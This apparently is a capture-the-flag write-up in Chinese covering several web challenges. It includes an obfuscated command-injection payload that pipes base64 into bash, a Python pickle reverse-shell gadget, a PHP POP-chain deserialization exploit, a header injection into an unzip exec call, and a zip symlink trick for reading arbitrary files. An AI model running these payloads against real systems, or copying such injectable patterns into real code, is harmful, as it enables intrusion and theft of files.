readbooks
payload
1
| public/*|e%22%22cho$%7BIFS%7D%22Y2F0IC9fZmxhZw%22$%7BIFS%7D|$%7BIFS%7Dba%22%22se64$%7BIFS%7D-d$%7BIFS%7D|$%7BIFS%7Db%22%22ash
|
pickelshop
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| import base64
import pickle
class shell(object):
def __reduce__(self):
return (eval, (
"__import__('os').system('echo | base64 -d | bash ')",))
k = shell()
print(base64.b64encode(pickle.dumps(k)))
|
反弹shell
POPgadget
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
| <?php
class Fun{
private $func;
public function __construct(){
$this->func = [new Test(),"q222"];
$this->func="Test::getFlag";
}
}
class Test{
public function __call($f,$p){
echo getenv("FLAG");
}
public function __wakeup(){
echo "serialize me?";
}
}
class A {
public $a;
public function __get($p){
if(preg_match("/Test/",get_class($this->a))){
return "No test in Prod\n";
}
return $this->a->$p();
}
}
class B {
public $p;
public function __destruct(){
$p = $this->p;
echo $this->a->$p;
}
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$r = serialize($b);
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);
|
zupload-pro-plus-max-ultra
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| <?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
die(file_get_contents('./upload'));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$file = $_FILES['file'];
$file_name = $file['name'];
$file_tmp = $file['tmp_name'];
$file_size = $file['size'];
$file_error = $file['error'];
$extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/';
$file_ext = explode('.', $file_name);
$file_ext = strtolower(end($file_ext));
$allowed = array('zip');
if (in_array($file_ext, $allowed)) {
if ($file_error === 0) {
if ($file_size <= 2097152) {
exec('unzip ' . $file_tmp . ' -d ' . $extract_to);
echo json_encode(array(
'status' => 'ok',
'message' => 'File uploaded successfully',
'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
));
}
}
} else {
echo json_encode(array(
'status' => 'error',
'message' => 'Only zip files are allowed'
));
}
}
|
关键点在于
1
| $extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/';
|
和
1
| exec('unzip ' . $file_tmp . ' -d ' . $extract_to);
|
这里的$extract_to是可控的,直接拼接命令执行就可以
1
| X-Extract-To: ./;cat /flag>>key.php
|
zupload-pro-plus-max-ultra-premium
unzip软链接
1
2
3
| touch /flag
ln -s /flag flag
zip --symlinks payload.zip flag
|
访问下载/uploads/flag即可
